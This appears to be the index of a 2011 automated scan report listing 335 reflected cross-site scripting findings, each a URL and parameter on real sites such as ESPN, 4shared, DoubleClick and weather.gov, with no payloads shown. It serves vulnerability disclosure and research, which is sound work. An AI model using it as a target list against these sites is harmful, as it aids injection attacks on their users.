XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 10182011-04

Report generated by XSS.CX at Tue Oct 18 07:58:25 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

1. Cross-site scripting (reflected)

1.1. http://66.226.75.109/areaCodes/detail/240/x22 [REST URL parameter 3]

1.2. http://a.collective-media.net/adj/manta.comp/energy_resources [REST URL parameter 2]

1.3. http://a.collective-media.net/adj/manta.comp/energy_resources [REST URL parameter 3]

1.4. http://a.collective-media.net/adj/manta.comp/energy_resources [k parameter]

1.5. http://a.collective-media.net/adj/manta.comp/energy_resources [name of an arbitrarily supplied request parameter]

1.6. http://a.collective-media.net/adj/manta.comp/energy_resources [pos parameter]

1.7. http://a.collective-media.net/cmadj/manta.comp/energy_resources [REST URL parameter 1]

1.8. http://a.collective-media.net/cmadj/manta.comp/energy_resources [REST URL parameter 2]

1.9. http://a.collective-media.net/cmadj/manta.comp/energy_resources [REST URL parameter 3]

1.10. http://a.collective-media.net/cmadj/manta.comp/energy_resources [k parameter]

1.11. http://a.collective-media.net/cmadj/manta.comp/energy_resources [name of an arbitrarily supplied request parameter]

1.12. http://a.collective-media.net/cmadj/manta.comp/energy_resources [pos parameter]

1.13. http://a.espncdn.com/combiner/c [css parameter]

1.14. http://a.espncdn.com/combiner/c [js parameter]

1.15. http://a.espncdn.com/combiner/c/201012011221 [js parameter]

1.16. http://a.espncdn.com/combiner/c/201012011221 [js parameter]

1.17. http://abc.go.com/watch [aa parameter]

1.18. http://abc.go.com/watch [aa parameter]

1.19. http://abc.go.com/watch [aff parameter]

1.20. http://abc.go.com/watch [aff parameter]

1.21. http://abc.go.com/watch [al parameter]

1.22. http://abc.go.com/watch [al parameter]

1.23. http://abc.go.com/watch [i parameter]

1.24. http://abc.go.com/watch [i parameter]

1.25. http://abc.go.com/watch [name of an arbitrarily supplied request parameter]

1.26. http://abc.go.com/watch [name of an arbitrarily supplied request parameter]

1.27. http://abc.go.com/watch [partner parameter]

1.28. http://abc.go.com/watch [partner parameter]

1.29. http://abc.go.com/watch [pc parameter]

1.30. http://abc.go.com/watch [pc parameter]

1.31. http://abc.go.com/watch [pl parameter]

1.32. http://abc.go.com/watch [pl parameter]

1.33. http://abclocal.go.com/wls/story [section parameter]

1.34. http://ad.doubleclick.net/adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348 [adurl parameter]

1.35. http://ad.doubleclick.net/adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348 [ai parameter]

1.36. http://ad.doubleclick.net/adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348 [client parameter]

1.37. http://ad.doubleclick.net/adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348 [num parameter]

1.38. http://ad.doubleclick.net/adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348 [sig parameter]

1.39. http://ad.doubleclick.net/adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348 [sz parameter]

1.40. http://ad.doubleclick.net/adj/KOMO/HOME [sz parameter]

1.41. http://ad.doubleclick.net/adj/KOMO/HOME [sz parameter]

1.42. http://ak.quantcast.com/css/ie6.css [REST URL parameter 1]

1.43. http://ak.quantcast.com/css/ie6.css [REST URL parameter 2]

1.44. http://ak.quantcast.com/css/ie7.css [REST URL parameter 1]

1.45. http://ak.quantcast.com/css/ie7.css [REST URL parameter 2]

1.46. http://ak.quantcast.com/dynamic-css/screen-optimized.css [REST URL parameter 1]

1.47. http://ak.quantcast.com/dynamic-css/screen-optimized.css [REST URL parameter 2]

1.48. http://ak.quantcast.com/images/sprite.png [REST URL parameter 1]

1.49. http://ak.quantcast.com/images/sprite.png [REST URL parameter 2]

1.50. http://ak.quantcast.com/js/concat.js [REST URL parameter 1]

1.51. http://ak.quantcast.com/js/concat.js [REST URL parameter 2]

1.52. http://api.bing.com/qsonhs.aspx [q parameter]

1.53. http://areacode.org/803 [name of an arbitrarily supplied request parameter]

1.54. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 [REST URL parameter 2]

1.55. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 [REST URL parameter 3]

1.56. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 [REST URL parameter 4]

1.57. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 [REST URL parameter 5]

1.58. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 [REST URL parameter 6]

1.59. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 [REST URL parameter 7]

1.60. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 [REST URL parameter 2]

1.61. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 [REST URL parameter 3]

1.62. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 [REST URL parameter 4]

1.63. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 [REST URL parameter 5]

1.64. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 [REST URL parameter 6]

1.65. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/1b5458553-7549-414b-83d2-2100a7556d38@x90 [REST URL parameter 7]

1.66. http://broadband.espn.go.com/espn3/auth/espnnetworks/user [callback parameter]

1.67. http://dc305.4shared.com/main/upload.jsp [REST URL parameter 1]

1.68. http://dc305.4shared.com/main/upload.jsp [REST URL parameter 2]

1.69. http://dc308.4shared.com/main/upload.jsp [REST URL parameter 1]

1.70. http://dc308.4shared.com/main/upload.jsp [REST URL parameter 2]

1.71. http://digg.com/submit [REST URL parameter 1]

1.72. http://ds.addthis.com/red/psi/sites/www.manta.com/p.json [callback parameter]

1.73. http://e1.cdn.qnsr.com/cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js [REST URL parameter 10]

1.74. http://e1.cdn.qnsr.com/cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js [REST URL parameter 11]

1.75. http://e1.cdn.qnsr.com/cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js [REST URL parameter 4]

1.76. http://e1.cdn.qnsr.com/cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js [REST URL parameter 7]

1.77. http://e1.cdn.qnsr.com/cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js [REST URL parameter 8]

1.78. http://e1.cdn.qnsr.com/cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js [REST URL parameter 9]

1.79. http://e2.cdn.qnsr.com//cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js [REST URL parameter 10]

1.80. http://e2.cdn.qnsr.com//cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js [REST URL parameter 11]

1.81. http://e2.cdn.qnsr.com//cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js [REST URL parameter 4]

1.82. http://e2.cdn.qnsr.com//cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js [REST URL parameter 7]

1.83. http://e2.cdn.qnsr.com//cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js [REST URL parameter 8]

1.84. http://e2.cdn.qnsr.com//cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js [REST URL parameter 9]

1.85. http://e2.cdn.qnsr.com//cgi/k/20132865/1537/0/0/203687984/203687984//0/203/9542//1000002/i.js [REST URL parameter 7]

1.86. http://e2.cdn.qnsr.com//cgi/k/20135122/1793/0/0/203687991/203687991//0/203/9542//5000005/i.js [REST URL parameter 7]

1.87. http://e2.cdn.qnsr.com//cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js [REST URL parameter 10]

1.88. http://e2.cdn.qnsr.com//cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js [REST URL parameter 11]

1.89. http://e2.cdn.qnsr.com//cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js [REST URL parameter 4]

1.90. http://e2.cdn.qnsr.com//cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js [REST URL parameter 5]

1.91. http://e2.cdn.qnsr.com//cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js [REST URL parameter 6]

1.92. http://e2.cdn.qnsr.com//cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js [REST URL parameter 7]

1.93. http://e2.cdn.qnsr.com//cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js [REST URL parameter 8]

1.94. http://e2.cdn.qnsr.com//cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js [REST URL parameter 9]

1.95. http://e2.cdn.qnsr.com//cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 10]

1.96. http://e2.cdn.qnsr.com//cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 11]

1.97. http://e2.cdn.qnsr.com//cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 4]

1.98. http://e2.cdn.qnsr.com//cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 5]

1.99. http://e2.cdn.qnsr.com//cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 6]

1.100. http://e2.cdn.qnsr.com//cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 7]

1.101. http://e2.cdn.qnsr.com//cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 8]

1.102. http://e2.cdn.qnsr.com//cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 9]

1.103. http://e2.cdn.qnsr.com//cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js [REST URL parameter 10]

1.104. http://e2.cdn.qnsr.com//cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js [REST URL parameter 11]

1.105. http://e2.cdn.qnsr.com//cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js [REST URL parameter 4]

1.106. http://e2.cdn.qnsr.com//cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js [REST URL parameter 7]

1.107. http://e2.cdn.qnsr.com//cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js [REST URL parameter 8]

1.108. http://e2.cdn.qnsr.com//cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js [REST URL parameter 9]

1.109. http://e2.cdn.qnsr.com//cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 10]

1.110. http://e2.cdn.qnsr.com//cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 11]

1.111. http://e2.cdn.qnsr.com//cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 4]

1.112. http://e2.cdn.qnsr.com//cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 5]

1.113. http://e2.cdn.qnsr.com//cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 6]

1.114. http://e2.cdn.qnsr.com//cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 7]

1.115. http://e2.cdn.qnsr.com//cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 8]

1.116. http://e2.cdn.qnsr.com//cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 9]

1.117. http://espn.go.com/blog/new-york/hockey/category/_/name/new-jersey-devils [REST URL parameter 7]

1.118. http://espn.go.com/blog/new-york/hockey/category/_/name/new-york-islanders [REST URL parameter 7]

1.119. http://espn.go.com/blog/new-york/hockey/category/_/name/new-york-rangers [REST URL parameter 7]

1.120. http://espn.go.com/blog/new-york/knicks/post/_/id/2851/melo-will-wear-no-7-for-the-knicks [REST URL parameter 8]

1.121. http://espn.go.com/blog/new-york/knicks/post/_/id/2851/melo-will-wear-no-7-for-the-knicks [name of an arbitrarily supplied request parameter]

1.122. http://espn.go.com/blog/new-yorkjets/post/_/id/4686/rex-tannenbaum-ready-for-prime-time [REST URL parameter 7]

1.123. http://espn.go.com/blog/new-yorkjets/post/_/id/4686/rex-tannenbaum-ready-for-prime-time [name of an arbitrarily supplied request parameter]

1.124. http://espn.go.com/espn/rss/newyork/news [name of an arbitrarily supplied request parameter]

1.125. http://espn.go.com/ncb/conversation [name of an arbitrarily supplied request parameter]

1.126. http://espn.go.com/new-york/columns/archive [name parameter]

1.127. http://espn.go.com/videohub/mpf/config.prodXml [adminOver parameter]

1.128. http://forecast.weather.gov/product.php [highlight parameter]

1.129. http://games.espn.go.com/frontpage/ [REST URL parameter 1]

1.130. http://ib.adnxs.com/ab [cnd parameter]

1.131. http://insider.espn.go.com/mlb/blog [name of an arbitrarily supplied request parameter]

1.132. https://login.barracudanetworks.com/ [name of an arbitrarily supplied request parameter]

1.133. http://mf.sitescout.com/tag.jsp [h parameter]

1.134. http://mf.sitescout.com/tag.jsp [pid parameter]

1.135. http://mf.sitescout.com/tag.jsp [w parameter]

1.136. http://pittsburgh.citysearch.com/guide/bloomfield-pittsburgh-pa/x26amp [name of an arbitrarily supplied request parameter]

1.137. http://pittsburgh.citysearch.com/guide/pittsburgh-pa/x26amp [name of an arbitrarily supplied request parameter]

1.138. http://pittsburgh.citysearch.com/listings/bloomfield/musical_instruments/8667_3948 [REST URL parameter 2]

1.139. http://pittsburgh.citysearch.com/listings/bloomfield/musical_instruments/8667_3948 [REST URL parameter 3]

1.140. http://pittsburgh.citysearch.com/listings/bloomfield/musical_instruments/8667_3948/x22 [name of an arbitrarily supplied request parameter]

1.141. http://projects.webappsec.org/w/page-revisions/13246986/Web-Application-Security-Scanner-Evaluation-Criteria [REST URL parameter 4]

1.142. http://projects.webappsec.org/w/page-revisions/13246986/a [REST URL parameter 4]

1.143. http://pubads.g.doubleclick.net/gampad/ads [slotname parameter]

1.144. http://qa.wimgo.com/bloomfield-nm/shopping/musical-instruments/x22 [REST URL parameter 3]

1.145. http://qa.wimgo.com/bloomfield-nm/shopping/musical-instruments/x22 [REST URL parameter 3]

1.146. http://qa.wimgo.com/bloomfield-nm/shopping/musical-instruments/x22 [REST URL parameter 4]

1.147. http://qa.wimgo.com/bloomfield-nm/shopping/musical-instruments/x22 [REST URL parameter 4]

1.148. http://qa.wimgo.com/bloomfield-nm/shopping/musical-instruments/x22 [name of an arbitrarily supplied request parameter]

1.149. http://qa.wimgo.com/bloomfield-nm/shopping/musical-instruments/x22 [name of an arbitrarily supplied request parameter]

1.150. https://r.espn.go.com/members/util/getUserInfo [cb parameter]

1.151. http://radar.weather.gov/radar_lite.php [loop parameter]

1.152. http://radar.weather.gov/radar_lite.php [product parameter]

1.153. http://recreationalequipmen.tt.omtrdc.net/m2/recreationalequipmen/mbox/standard [mbox parameter]

1.154. http://recs.richrelevance.com/rrserver/p13n_generated.js [ctp parameter]

1.155. http://response.restoration.noaa.gov/orr_search.php [message parameter]

1.156. http://response.restoration.noaa.gov/orr_search.php [name of an arbitrarily supplied request parameter]

1.157. http://rtb0.doubleverify.com/rtb.ashx/verifyc [callback parameter]

1.158. http://search.4shared.com/css/common.css [REST URL parameter 1]

1.159. http://search.4shared.com/css/common.css [REST URL parameter 2]

1.160. http://search.4shared.com/css/main.css [REST URL parameter 1]

1.161. http://search.4shared.com/css/main.css [REST URL parameter 2]

1.162. http://search.4shared.com/css/mainWithoutCommon.css [REST URL parameter 1]

1.163. http://search.4shared.com/css/mainWithoutCommon.css [REST URL parameter 2]

1.164. http://search.4shared.com/js/utils.js [REST URL parameter 1]

1.165. http://search.4shared.com/js/utils.js [REST URL parameter 2]

1.166. http://search.4shared.com/search.html [name of an arbitrarily supplied request parameter]

1.167. http://search.espn.go.com/s/ie8/suggestions [REST URL parameter 2]

1.168. http://search.espn.go.com/s/ie8/suggestions [REST URL parameter 3]

1.169. http://search.komonews.com/ [name of an arbitrarily supplied request parameter]

1.170. http://search.komonews.com/Boeing [name of an arbitrarily supplied request parameter]

1.171. http://search.komonews.com/Microsoft [name of an arbitrarily supplied request parameter]

1.172. http://search.komonews.com/National-Leaders/Barack-Obama [name of an arbitrarily supplied request parameter]

1.173. http://search.komonews.com/Sports/Mariners [name of an arbitrarily supplied request parameter]

1.174. http://search.komonews.com/Sports/Seahawks [name of an arbitrarily supplied request parameter]

1.175. http://search.komonews.com/Sports/Sounders [name of an arbitrarily supplied request parameter]

1.176. http://search.komonews.com/default.aspx [name of an arbitrarily supplied request parameter]

1.177. http://search.komonews.com/default.aspx [q parameter]

1.178. http://soccernet.espn.go.com/team [cc parameter]

1.179. http://soccernet.espn.go.com/team [cc parameter]

1.180. http://sports.espn.go.com/chicago/nba/columns/story [columnist parameter]

1.181. http://sports.espn.go.com/chicago/nfl/columns/story [columnist parameter]

1.182. http://sports.espn.go.com/chicago/teams/recap [sport parameter]

1.183. http://sports.espn.go.com/espn/js/uniloginInLineReplace [cb parameter]

1.184. http://sports.espn.go.com/golf/columns/story [columnist parameter]

1.185. http://sports.espn.go.com/mlb/columns/story [id parameter]

1.186. http://sports.espn.go.com/ncaa/columns/story [columnist parameter]

1.187. http://sports.espn.go.com/ncaa/columns/story [id parameter]

1.188. http://sports.espn.go.com/new-york/mlb/columns/story [columnist parameter]

1.189. http://sports.espn.go.com/new-york/nba/columns/story [columnist parameter]

1.190. http://sports.espn.go.com/new-york/ncb/columns/story [columnist parameter]

1.191. http://sports.espn.go.com/new-york/nfl/columns/story [columnist parameter]

1.192. http://sports.espn.go.com/new-york/teams/recap [sport parameter]

1.193. http://static.4shared.com/bundles/css/630963420/css/openid.css [REST URL parameter 1]

1.194. http://static.4shared.com/bundles/css/630963420/css/openid.css [REST URL parameter 2]

1.195. http://static.4shared.com/bundles/css/677814427/css/upload-frame.css [REST URL parameter 1]

1.196. http://static.4shared.com/bundles/css/677814427/css/upload-frame.css [REST URL parameter 2]

1.197. http://static.4shared.com/bundles/css/765844602/css/flags.css [REST URL parameter 1]

1.198. http://static.4shared.com/bundles/css/765844602/css/flags.css [REST URL parameter 2]

1.199. http://static.4shared.com/bundles/css/N162308233/css/network.css [REST URL parameter 1]

1.200. http://static.4shared.com/bundles/css/N162308233/css/network.css [REST URL parameter 2]

1.201. http://static.4shared.com/bundles/css/N90201876/css/ajax-suggestions.css [REST URL parameter 1]

1.202. http://static.4shared.com/bundles/css/N90201876/css/ajax-suggestions.css [REST URL parameter 2]

1.203. http://static.4shared.com/bundles/css/gzip_630963420/css/openid.css [REST URL parameter 1]

1.204. http://static.4shared.com/bundles/css/gzip_630963420/css/openid.css [REST URL parameter 2]

1.205. http://static.4shared.com/bundles/css/gzip_677814427/css/upload-frame.css [REST URL parameter 1]

1.206. http://static.4shared.com/bundles/css/gzip_677814427/css/upload-frame.css [REST URL parameter 2]

1.207. http://static.4shared.com/bundles/css/gzip_N90201876/css/ajax-suggestions.css [REST URL parameter 1]

1.208. http://static.4shared.com/bundles/css/gzip_N90201876/css/ajax-suggestions.css [REST URL parameter 2]

1.209. http://static.4shared.com/bundles/js/1258691160/bundles/js/global.js [REST URL parameter 1]

1.210. http://static.4shared.com/bundles/js/1258691160/bundles/js/global.js [REST URL parameter 2]

1.211. http://static.4shared.com/bundles/js/gzip_1258691160/bundles/js/global.js [REST URL parameter 1]

1.212. http://static.4shared.com/bundles/js/gzip_1258691160/bundles/js/global.js [REST URL parameter 2]

1.213. http://static.4shared.com/css/4shFeatures.css [REST URL parameter 1]

1.214. http://static.4shared.com/css/4shFeatures.css [REST URL parameter 2]

1.215. http://static.4shared.com/css/common.css [REST URL parameter 1]

1.216. http://static.4shared.com/css/common.css [REST URL parameter 2]

1.217. http://static.4shared.com/css/coolbuttons.css [REST URL parameter 1]

1.218. http://static.4shared.com/css/coolbuttons.css [REST URL parameter 2]

1.219. http://static.4shared.com/css/features.css [REST URL parameter 1]

1.220. http://static.4shared.com/css/features.css [REST URL parameter 2]

1.221. http://static.4shared.com/css/indexm.css [REST URL parameter 1]

1.222. http://static.4shared.com/css/indexm.css [REST URL parameter 2]

1.223. http://static.4shared.com/css/indexn.css [REST URL parameter 1]

1.224. http://static.4shared.com/css/indexn.css [REST URL parameter 2]

1.225. http://static.4shared.com/css/main.css [REST URL parameter 1]

1.226. http://static.4shared.com/css/main.css [REST URL parameter 2]

1.227. http://static.4shared.com/css/mainWithoutCommon.css [REST URL parameter 1]

1.228. http://static.4shared.com/css/mainWithoutCommon.css [REST URL parameter 2]

1.229. http://static.4shared.com/css/openid.css [REST URL parameter 1]

1.230. http://static.4shared.com/css/openid.css [REST URL parameter 2]

1.231. http://static.4shared.com/css/pageDownload1/download.css [REST URL parameter 1]

1.232. http://static.4shared.com/css/pageDownload1/download.css [REST URL parameter 2]

1.233. http://static.4shared.com/css/pageDownload1/download.css [REST URL parameter 3]

1.234. http://static.4shared.com/css/pageDownload1/downloadWithoutCommon.css [REST URL parameter 1]

1.235. http://static.4shared.com/css/pageDownload1/downloadWithoutCommon.css [REST URL parameter 2]

1.236. http://static.4shared.com/css/pageDownload1/downloadWithoutCommon.css [REST URL parameter 3]

1.237. http://static.4shared.com/css/tutorial.css [REST URL parameter 1]

1.238. http://static.4shared.com/css/tutorial.css [REST URL parameter 2]

1.239. http://static.4shared.com/desktop/desktop.css [REST URL parameter 1]

1.240. http://static.4shared.com/desktop/desktop.css [REST URL parameter 2]

1.241. http://static.4shared.com/dwr/engine.js [REST URL parameter 1]

1.242. http://static.4shared.com/dwr/engine.js [REST URL parameter 2]

1.243. http://static.4shared.com/dwr/interface/DirChecks.js [REST URL parameter 1]

1.244. http://static.4shared.com/dwr/interface/DirChecks.js [REST URL parameter 2]

1.245. http://static.4shared.com/favicon.ico [REST URL parameter 1]

1.246. http://static.4shared.com/images/all1.png [REST URL parameter 1]

1.247. http://static.4shared.com/images/all1.png [REST URL parameter 2]

1.248. http://static.4shared.com/images/bg14.png [REST URL parameter 1]

1.249. http://static.4shared.com/images/bg14.png [REST URL parameter 2]

1.250. http://static.4shared.com/images/facebook/login-button.png [REST URL parameter 1]

1.251. http://static.4shared.com/images/facebook/login-button.png [REST URL parameter 2]

1.252. http://static.4shared.com/images/facebook/login-button.png [REST URL parameter 3]

1.253. http://static.4shared.com/images/googleW.png [REST URL parameter 1]

1.254. http://static.4shared.com/images/googleW.png [REST URL parameter 2]

1.255. http://static.4shared.com/images/icons/16x16/close.gif [REST URL parameter 1]

1.256. http://static.4shared.com/images/icons/16x16/close.gif [REST URL parameter 2]

1.257. http://static.4shared.com/images/icons/16x16/close.gif [REST URL parameter 3]

1.258. http://static.4shared.com/images/icons/16x16/close.gif [REST URL parameter 4]

1.259. http://static.4shared.com/images/icons/16x16/stop.gif [REST URL parameter 1]

1.260. http://static.4shared.com/images/icons/16x16/stop.gif [REST URL parameter 2]

1.261. http://static.4shared.com/images/icons/16x16/stop.gif [REST URL parameter 3]

1.262. http://static.4shared.com/images/icons/16x16/stop.gif [REST URL parameter 4]

1.263. http://static.4shared.com/images/icons/misc/upload.gif [REST URL parameter 1]

1.264. http://static.4shared.com/images/icons/misc/upload.gif [REST URL parameter 2]

1.265. http://static.4shared.com/images/icons/misc/upload.gif [REST URL parameter 3]

1.266. http://static.4shared.com/images/icons/misc/upload.gif [REST URL parameter 4]

1.267. http://static.4shared.com/images/ipic.jpg [REST URL parameter 1]

1.268. http://static.4shared.com/images/ipic.jpg [REST URL parameter 2]

1.269. http://static.4shared.com/js/dw_drag.js [REST URL parameter 1]

1.270. http://static.4shared.com/js/dw_drag.js [REST URL parameter 2]

1.271. http://static.4shared.com/js/dw_event.js [REST URL parameter 1]

1.272. http://static.4shared.com/js/dw_event.js [REST URL parameter 2]

1.273. http://static.4shared.com/js/dw_viewport.js [REST URL parameter 1]

1.274. http://static.4shared.com/js/dw_viewport.js [REST URL parameter 2]

1.275. http://static.4shared.com/js/dw_writedrag.js [REST URL parameter 1]

1.276. http://static.4shared.com/js/dw_writedrag.js [REST URL parameter 2]

1.277. http://static.4shared.com/js/index.js [REST URL parameter 1]

1.278. http://static.4shared.com/js/index.js [REST URL parameter 2]

1.279. http://static.4shared.com/js/jquery-1.4.4.min.js [REST URL parameter 1]

1.280. http://static.4shared.com/js/jquery-1.4.4.min.js [REST URL parameter 2]

1.281. http://static.4shared.com/js/login_fnc.js [REST URL parameter 1]

1.282. http://static.4shared.com/js/login_fnc.js [REST URL parameter 2]

1.283. http://static.4shared.com/js/plugins/jquery.openid.js [REST URL parameter 1]

1.284. http://static.4shared.com/js/plugins/jquery.openid.js [REST URL parameter 2]

1.285. http://static.4shared.com/js/plugins/jquery.openid.js [REST URL parameter 3]

1.286. http://static.4shared.com/js/signup-script.jsp [REST URL parameter 1]

1.287. http://static.4shared.com/js/signup-script.jsp [REST URL parameter 2]

1.288. http://static.4shared.com/press_room/press_room.css [REST URL parameter 1]

1.289. http://static.4shared.com/press_room/press_room.css [REST URL parameter 2]

1.290. http://static.4shared.com/themes/default.css [REST URL parameter 1]

1.291. http://static.4shared.com/themes/default.css [REST URL parameter 2]

1.292. http://technorati.com/cosmos/search.html [url parameter]

1.293. http://technorati.com/cosmos/search.html [url parameter]

1.294. http://uid.shoplocal.com/uid.aspx [callback parameter]

1.295. http://wiki.answers.com/Q/FAQ/1873/x26amp [REST URL parameter 1]

1.296. http://wiki.answers.com/Q/FAQ/1873/x26amp [REST URL parameter 2]

1.297. http://wiki.answers.com/Q/FAQ/1873/x26amp [REST URL parameter 3]

1.298. http://wiki.answers.com/Q/FAQ/1873/x26amp [REST URL parameter 3]

1.299. http://wiki.answers.com/Q/FAQ/1873/x26amp [REST URL parameter 4]

1.300. http://wiki.answers.com/Q/FAQ/1873/x26amp [REST URL parameter 4]

1.301. http://wiki.answers.com/Q/FAQ/1873/x26amp [name of an arbitrarily supplied request parameter]

1.302. http://wiki.answers.com/Q/FAQ/2637/x26amp [REST URL parameter 1]

1.303. http://wiki.answers.com/Q/FAQ/2637/x26amp [REST URL parameter 2]

1.304. http://wiki.answers.com/Q/FAQ/2637/x26amp [REST URL parameter 3]

1.305. http://wiki.answers.com/Q/FAQ/2637/x26amp [REST URL parameter 3]

1.306. http://wiki.answers.com/Q/FAQ/2637/x26amp [REST URL parameter 4]

1.307. http://wiki.answers.com/Q/FAQ/2637/x26amp [REST URL parameter 4]

1.308. http://wiki.answers.com/Q/FAQ/2637/x26amp [name of an arbitrarily supplied request parameter]

1.309. http://www.4shared.com/advertise/ [REST URL parameter 1]

1.310. http://www.4shared.com/advertise/banners/desktop/300x250.jsp [REST URL parameter 1]

1.311. http://www.4shared.com/advertise/banners/desktop/300x250.jsp [REST URL parameter 2]

1.312. http://www.4shared.com/advertise/banners/desktop/300x250.jsp [REST URL parameter 3]

1.313. http://www.4shared.com/advertise/banners/desktop/300x250.jsp [REST URL parameter 4]

1.314. http://www.4shared.com/advertise/banners/desktop/728x90.jsp [REST URL parameter 1]

1.315. http://www.4shared.com/advertise/banners/desktop/728x90.jsp [REST URL parameter 2]

1.316. http://www.4shared.com/advertise/banners/desktop/728x90.jsp [REST URL parameter 3]

1.317. http://www.4shared.com/advertise/banners/desktop/728x90.jsp [REST URL parameter 4]

1.318. http://www.4shared.com/contact.jsp [REST URL parameter 1]

1.319. http://www.4shared.com/css/common.css [REST URL parameter 1]

1.320. http://www.4shared.com/css/common.css [REST URL parameter 2]

1.321. http://www.4shared.com/css/main.css [REST URL parameter 1]

1.322. http://www.4shared.com/css/main.css [REST URL parameter 2]

1.323. http://www.4shared.com/css/mainWithoutCommon.css [REST URL parameter 1]

1.324. http://www.4shared.com/css/mainWithoutCommon.css [REST URL parameter 2]

1.325. http://www.4shared.com/desktop/ [REST URL parameter 1]

1.326. http://www.4shared.com/enter.jsp [REST URL parameter 1]

1.327. http://www.4shared.com/enter.jsp [au parameter]

1.328. http://www.4shared.com/faq.jsp [REST URL parameter 1]

1.329. http://www.4shared.com/favicon.ico [REST URL parameter 1]

1.330. http://www.4shared.com/icons/16x16/ [REST URL parameter 1]

1.331. http://www.4shared.com/icons/16x16/ [REST URL parameter 2]

1.332. http://www.4shared.com/images/blueBanner_plus.gif [REST URL parameter 1]

1.333. http://www.4shared.com/images/blueBanner_plus.gif [REST URL parameter 2]

1.334. http://www.4shared.com/images/index-premium-features.png [REST URL parameter 1]

1.335. http://www.4shared.com/images/index-premium-features.png [REST URL parameter 2]

